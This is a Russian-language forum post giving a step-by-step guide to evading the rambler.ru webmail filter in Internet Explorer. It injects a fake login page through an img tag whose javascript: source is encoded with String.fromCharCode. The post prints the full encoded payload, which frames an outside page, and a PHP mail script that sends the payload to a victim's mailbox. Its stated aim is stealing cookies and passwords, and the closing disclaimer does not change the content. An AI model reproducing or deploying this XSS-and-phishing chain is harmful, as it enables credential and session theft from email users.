ISRAEL
Сообщений: 6
Оценки: 0
Присоединился: 2005-10-03 06:20:04
|
Обман фильта на сервере rambler.ru
Ну я решыл разместить ето как информацыю для пользователей сайта рамблера ето только для тех у кого браузер ie !
И так как можно обмануть фильтр ?
Сначала делаем какую либо страничку у вас на сайте с каким неть злым скриптом ето может быть всякий скрипт от угона куков до угона паролей я использовал страничку скрипта auth известный как Угон паролей !
тест скрипта находится тут Смотреть страничку теста
Канечно для рамблера надо будит хакеру сделать страничку подобную самому рамблеру !
Кокда сделали уже страничку со скриптом надо её поместить в frame вот пример
Code
<frameset rows="*"><frame name="main" src="http://yousite.ru/some.php"><noframes><body></body></noframes></frameset></html>
Зашевровать в чар код frame вам надо зайти Сюда и ввести frame в чар код
Теперь надо использовать елементы java вот пример
Code
javascript:document.write(String.fromCharCode(your charcode));
На рамблере ето надо использовать таким примером !
Code
<img g=">"
src="javascript:document.write(String.fromCharCode(Ваш frame на сам скрипт зашыфрованый в чар коде));">
вот вас ето надо послать пользователю рамблера.
Я покажу какой код я послал
Code
<img g=">"
src="javascript:document.write(String.fromCharCode(60, 102, 114, 97, 109, 101, 115, 101, 116, 32, 114, 111, 119, 115, 61, 34, 42, 34, 62, 60, 102, 114, 97, 109, 101, 32, 110, 97, 109, 101, 61, 34, 109, 97, 105, 110, 34, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 109, 111, 100, 101, 114, 115, 46, 117, 99, 111, 122, 46, 114, 117, 47, 109, 97, 105, 108, 46, 104, 116, 109, 34, 62, 60, 110, 111, 102, 114, 97, 109, 101, 115, 62, 60, 98, 111, 100, 121, 62, 60, 47, 98, 111, 100, 121, 62, 60, 47, 110, 111, 102, 114, 97, 109, 101, 115, 62, 60, 47, 102, 114, 97, 109, 101, 115, 101, 116, 62, 60, 47, 104, 116, 109, 108, 62));">
Послать можно етот код в формате html сделав такой php скрипт !
Code
<?php
// Тема письма
$subject = 'chat@mail.ru';
// сообщение
$message = '
<html>
<head>
Сюда надо вам поставить гатовый код с java и с чар кодом.
</body>
</html>
';
// Поселаем с декодом странички можно укозать любой но желательно "charset=windows-1251"
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
// Добавки к письму
$headers .= 'To:jertva@rambler.ru' . "\r\n"; // Кому послать (почта жертвы)
$headers .= 'From:vahapochta@mail.ru' . "\r\n"; // От кого
// Послать
mail($to, $subject, $message, $headers);
?>
Кокда жертва получить песьмо кокда нажмёт чтоб прочесть автоматом переведёт на страничку вашего скрипта не изменая адреса вверху браузера вот примеры
�89� �1011�
информация вылаженная на этом сайте только для онзнакомления и не расценивается как шаг к действиям.
">
|
Обман rambler.ru (Обеснение) - 
